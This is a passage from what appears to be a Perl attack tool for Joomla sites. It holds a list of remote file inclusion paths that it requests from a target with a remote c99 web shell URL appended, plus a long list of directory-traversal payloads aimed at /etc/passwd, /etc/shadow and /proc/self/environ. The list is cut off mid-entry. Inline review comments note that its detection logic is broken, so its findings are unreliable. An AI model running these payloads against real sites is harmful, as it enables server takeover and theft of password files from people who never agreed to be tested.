          "/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=",
          "/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=",
          "/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=",
          "/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=",
          "/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=",
          "/administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=",
          "/components/com_mp3_allopass/allopass.php?mosConfig_live_site=",
          "/components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=",
          "/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=",
          "/administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=",
          "/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=",
          "/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=",
          "/administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=",
          "/administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=",
          "/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=",
          "/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=",
          "/administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=",
          "/administrator/components/com_color/admin.color.php?mosConfig_live_site=",
          "/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=",
          "/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=",
          "/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=",
          "/index.php?option=com_adsmanager&mosConfig_absolute_path=",
          "/com_ponygallery/admin.ponygallery.html.php?mosConfig_absolute_path=",
          "/com_magazine_3_0_1/magazine.functions.php?config=",
          "/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=",
          "/administrator/components/com_universal/includes/config/config.html.php?mosConfig_absolute_path=",
          "/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]="
      );

      # Operator supplies the base URL; it is used as typed, with no
      # validation or normalisation before being concatenated below.
      print "Please Enter Target [http://www.site.com]";
      print "\n\n Target:";
      chomp($Target = <STDIN>);
      print "\n\n \t\t Please wait";
      sleep(2);
      print "\n";

      for my $path (@RFI) {
          # base URL + script path/parameter + fixed remote URL as the value
          my $probe_url = $Target . $path . "http://www.sh3ll.org/c99.txt";

          # get() is presumably LWP::Simple's (imported at the top of the
          # script); a failed fetch leaves $body undefined.
          my $body = get($probe_url);

          # This guard tests the URL string, which is always defined, so it
          # never fires; fetch failures are not detected here.
          die "Can not get $probe_url" unless defined $probe_url;

          # NOTE(review): only the first pattern is bound to the response
          # body; the other three are matched against $_. The verdict logged
          # below is therefore not a reliable indicator in either direction.
          $Message =
              ($body =~ /c99shell/ || /safe_mode/ || /Executed / || /Shell/)
              ? "RFI Vulnerability FOUND"
              : "NOT FOUND RFI Vulnerability";

          print "\n \n \n \n \t \t \t \t FINISH ";
          print "\n $probe_url  =>   $Message \n";

          # Result log is reopened in append mode for every request; the
          # open/print/close calls are unchecked, so a write failure is silent.
          open(TEXT, '>>RFI.txt');
          print TEXT "\n $probe_url   =>   $Message \n\n";
          close(TEXT);
          print 'result in RFI.txt';
      }
  }
  1392. if($c eq '3')
  1393. {
  1394. system('cls');
  1395. system('title Joomla LFI Scanner');
  1396. @LFI =("/etc/passwd","../etc/passwd","../../etc/passwd","../../../etc/passwd","../../../../etc/passwd","../../../../../etc/passwd","../../../../../../etc/passwd","../../../../../../../etc/passwd","../../../../../../../../etc/passwd","../../../../../../../../../etc/passwd","../../../../../../../../../../etc/passwd","/etc/passwd%00","../etc/passwd%00","../../etc/passwd%00","../../../etc/passwd%00","../../../../etc/passwd%00","../../../../../etc/passwd%00","../../../../../../etc/passwd%00","../../../../../../../etc/passwd%00","../../../../../../../../etc/passwd%00","../../../../../../../../../etc/passwd%00","../../../../../../../../../../etc/passwd%00","....//etc/passwd","....//....//etc/passwd","....//....//....//etc/passwd","....//....//....//....//etc/passwd","....//....//....//....//....//etc/passwd","....//....//....//....//....//....//etc/passwd","....//....//....//....//....//....//....//etc/passwd","....//....//....//....//....//....//....//....//etc/passwd","....//....//....//....//....//....//....//....//....//etc/passwd","....//....//....//....//....//....//....//....//....//....//etc/passwd","....//etc/passwd%00","....//....//etc/passwd%00","....//....//....//etc/passwd%00","....//....//....//....//etc/passwd%00","....//....//....//....//....//etc/passwd%00","....//....//....//....//....//....//etc/passwd%00","....//....//....//....//....//....//....//etc/passwd%00","....//....//....//....//....//....//....//....//etc/passwd%00","....//....//....//....//....//....//....//....//....//etc/passwd%00","....//....//....//....//....//....//....//....//....//....//etc/passwd%00","%2Fetc%2Fpasswd","..%2Fetc%2Fpasswd","..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","%2Fetc%2Fpasswd%00","..%2Fetc%2Fpasswd%00","..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","....%2f%2Fetc/passwd","....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","/proc/self/environ","../proc/self/environ","../../proc/self/environ","../.
./../proc/self/environ","../../../../proc/self/environ","../../../../../proc/self/environ","../../../../../../proc/self/environ","../../../../../../../proc/self/environ","../../../../../../../../proc/self/environ","../../../../../../../../../proc/self/environ","../../../../../../../../../../proc/self/environ","/proc/self/environ%00","../proc/self/environ%00","../../proc/self/environ%00","../../../proc/self/environ%00","../../../../proc/self/environ%00","../../../../../proc/self/environ%00","../../../../../../proc/self/environ%00","../../../../../../../proc/self/environ%00","../../../../../../../../proc/self/environ%00","../../../../../../../../../proc/self/environ%00","../../../../../../../../../../proc/self/environ%00","%2Fproc%2Fself%2Fenviron","..%2Fproc%2Fself%2Fenviron","..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","%2Fproc%2Fself%2Fenviron%00","..%2Fproc%2Fself%2Fenviron%00","..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","//proc/self/environ","....//proc/self/environ","....//....//proc/self/environ","....//....//....//proc/self/environ","....//....//....//....//proc/self/
environ","....//....//....//....//....//proc/self/environ","....//....//....//....//....//....//proc/self/environ","....//....//....//....//....//....//....//proc/self/environ","....//....//....//....//....//....//....//....//proc/self/environ","....//....//....//....//....//....//....//....//....//proc/self/environ","....//....//....//....//....//....//....//....//....//....//proc/self/environ","//proc/self/environ%00","....//proc/self/environ%00","....//....//proc/self/environ%00","....//....//....//proc/self/environ%00","....//....//....//....//proc/self/environ%00","....//....//....//....//....//proc/self/environ%00","....//....//....//....//....//....//proc/self/environ%00","....//....//....//....//....//....//....//proc/self/environ%00","....//....//....//....//....//....//....//....//proc/self/environ%00","....//....//....//....//....//....//....//....//....//proc/self/environ%00","....//....//....//....//....//....//....//....//....//....//proc/self/environ%00","%2f%2Fproc/self/environ","....%2f%2Fproc/self/environ","....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","%2f%2Fproc/self/environ%00","....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%
2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","/etc/shadow","../etc/shadow","../../etc/shadow","../../../etc/shadow","../../../../etc/shadow","../../../../../etc/shadow","../../../../../../etc/shadow","../../../../../../../etc/shadow","../../../../../../../../etc/shadow","../../../../../../../../../etc/shadow","../../../../../../../../../../etc/shadow","/etc/shadow%00","../etc/shadow%00","../../etc/shadow%00","../../../etc/shadow%00","../../../../etc/shadow%00","../../../../../etc/shadow%00","../../../../../../etc/shadow%00","../../../../../../../etc/shadow%00","../../../../../../../../etc/shadow%00","../../../../../../../../../etc/shadow%00","../../../../../../../../../../etc/shadow%00","%2Fetc..%2Fshadow","..%2Fetc%2Fshadow","..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow","%2Fetc..%2Fshadow%00","..%2Fetc%2Fshadow%00","..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2
Fshadow%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00","%2F%2Fetc/shadow","....%2f%2Fetc/shadow","....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","%2F%2Fetc/shadow%00","....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....//etc/shadow","....//....//etc/shadow","....//....//....//etc/shadow","....//....//....//....//etc/shadow","....//....//....//....//....//etc/shadow","....//....//....//....//....//....//etc/shadow","....//....//....//....//....//....//....//etc/shadow","....//....//....//....//....//....//....//....//etc/shadow","....//....//....//....//....//....//....//....//....//etc/shadow","....//....//....//....//....//....//..
..//....//....//....//etc/shadow","....//etc/shadow%00","....//....//etc/shadow%00","....//....//....//etc/shadow%00","....//....//....//....//etc/shadow%00","....//....//....//....//....//etc/shadow%00","....//....//....//....//....//....//etc/shadow%00","....//....//....//....//....//....//....//etc/shadow%00","....//....//....//....//....//....//....//....//etc/shadow%00","....//....//....//....//....//....//....//....//....//etc/shadow%00","....//....//....//....//....//....//....//....//....//....//etc/shadow%00","/etc/group","../etc/group","../../etc/group","../../../etc/group","../../../../etc/group","../../../../../etc/group","../../../../../../etc/group","../../../../../../../etc/group","../../../../../../../../etc/group","../../../../../../../../../etc/group","../../../../../../../../../../etc/group","/etc/group%00","../etc/group%00","../../etc/group%00","../../../etc/group%00","../../../../etc/group%00","../../../../../etc/group%00","../../../../../../etc/group%00","../../../../../../../etc/group%00","../../../../../../../../etc/group%00","../../../../../../../../../etc/group%00","../../../../../../../../../../etc/group%00","%2Fetc..%2Fgroup","..%2Fetc%2Fgroup","..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup","%2Fetc%2Fgroup%00","..%2Fetc%2Fgroup%00","..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2
F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00","%2F%2Fetc/group","....%2F%2Fetc/group","....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","/etc/group%00","....%2F%2Fetc/group%00","....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","//etc/group","....//etc/group","....//....//etc/group","....//....//....//etc/group","....//....//....//....//etc/group","....//....//....//....//....//etc/group","....//....//....//....//....//....//etc/group","....//....//....//....//....//....//....//etc/group","....//....//....//....//....//....//....//....//etc/group","....//....//....//....//....//....//....//....//....//etc/group","....//....//....//....//....//....//....//....//....//....//etc/group","//etc/group%00","....//etc/group%00","....//....//etc/group%00","....//....//..
..//etc/group%00","....//....//....//....//etc/group%00","....//....//....//....//....//etc/group%00","....//....//....//....//....//....//etc/group%00","....//....//....//....//....//....//....//etc/group%00","....//....//....//....//....//....//....//....//etc/group%00","....//....//....//....//....//....//....//....//....//etc/group%00","....//....//....//....//....//....//....//....//....//....//etc/group%00","/etc/security/passwd","../etc/security/passwd","../../etc/security/passwd","../../../etc/security/passwd","../../../../etc/security/passwd","../../../../../etc/security/passwd","../../../../../../etc/security/passwd","../../../../../../../etc/security/passwd","../../../../../../../../etc/security/passwd","../../../../../../../../../etc/security/passwd","../../../../../../../../../../etc/security/passwd","/etc/security/passwd%00","../etc/security/passwd%00","../../etc/security/passwd%00","../../../etc/security/passwd%00","../../../../etc/security/passwd%00","../../../../../etc/security/passwd%00","../../../../../../etc/security/passwd%00","../../../../../../../etc/security/passwd%00","../../../../../../../../etc/security/passwd%00","../../../../../../../../../etc/security/passwd%00","../../../../../../../../../../etc/security/passwd%00","%2Fetc%2Fsecurity%2Fpasswd","..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","%2Fetc%2Fsecurity%2Fpasswd%00","..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F
etc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","..
..//etc/security/passwd","....//....//etc/security/passwd","....//....//....//etc/security/passwd","....//....//....//....//etc/security/passwd","....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//....//....//....//etc/security/passwd","....//etc/security/passwd%00","....//....//etc/security/passwd%00","....//....//....//etc/security/passwd%00","....//....//....//....//etc/security/passwd%00","....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//....//....//....//etc/security/passwd%00","/etc/security/passwd","../etc/security/passwd","../../etc/security/passwd","../../../etc/security/passwd","../../../../etc/security/passwd","../../../../../etc/security/passwd","../../../../../../etc/security/passwd","../../../../../../../etc/security/passwd","../../../../../../../../etc/security/passwd","../../../../../../../../../etc/security/passwd","../../../../../../../../../../etc/security/passwd","/etc/security/passwd%00","../etc/security/passwd%00","../../etc/security/passwd%00","../../../etc/security/passwd%00","../../../../etc/security/passwd%00","../../../../../etc/security/passwd%00","../../../../../../etc/security/passwd%00","../../../../../../../etc/security/passwd%00","../../../../../../../../etc/security/passwd%00","../../../../../../../../../etc/security/passwd%00","../../../../../../../../../../etc/security/passwd%00","%2Fetc%2Fsecurity%2Fpas
swd","..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","%2Fetc%2Fsecurity%2Fpasswd%00","..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F